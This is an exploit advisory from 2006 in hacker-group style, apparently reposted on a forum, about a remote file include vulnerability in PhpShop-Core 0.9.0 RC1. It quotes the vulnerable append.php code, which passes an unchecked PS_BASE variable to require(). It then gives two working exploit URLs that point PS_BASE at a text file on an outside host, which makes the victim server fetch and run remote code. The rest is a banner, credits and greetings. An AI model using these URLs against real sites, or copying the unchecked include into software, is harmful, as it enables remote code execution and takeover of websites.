PhpShop Core <= 0.9.0 RC1 (PS_BASE) File Include Vulnerabilities
[code]--------------------------------------|| Viva Palestine ||-----------------------------------------
PhpShop-Core (append.php) Remot File Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : include_once ($4AZHAR_TeAM."Securty.");
PalesTine Arab Muslim Hacker's
######################################################
#
# PhpShop-Core v0.9.0 RC1
#
# Class: Remote File Include Vulnerability
# Published 2006-10-27
# Remote: Yes
# Type: Dangerous
# Site: [url]http://www.comscripts.com/jump.php?action=script&id=81[/url]
#
# Author: Cold Zero
# Contact: [email]c.o.1.d.0@hotmail.com[/email]
#
######################################################
file ;
/core/html/append.php
/core/demo/append.php
==========================
Vuln Code
<?php
//
// This footer information must be on every page!
require($PS_BASE."modules/core/lib/ps_page_close.inc");
?>
======================================================
Exploit :
[url]Http://www.Victem.0/[/url][phpshop-core_PaTH]/modules/core/demo/append.php?PS_BASE=http://www.human2human.org/cold.txt?
[url]Http://www.Victem.0/[/url][phpshop-core_PaTH]/modules/core/html/append.php?PS_BASE=http://www.human2human.org/cold.txt?
---- Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageeb]
---- GreeTz: AlL : 4azhar.Com Members , All Xp10.com Members , Lezr.com Member , xhahax.org Members , Hack1h.com Members : Dm3r7.com Members
--------------------------------------|| Viva Palestine ||-----------------------------------------
[/code]
页:
[1]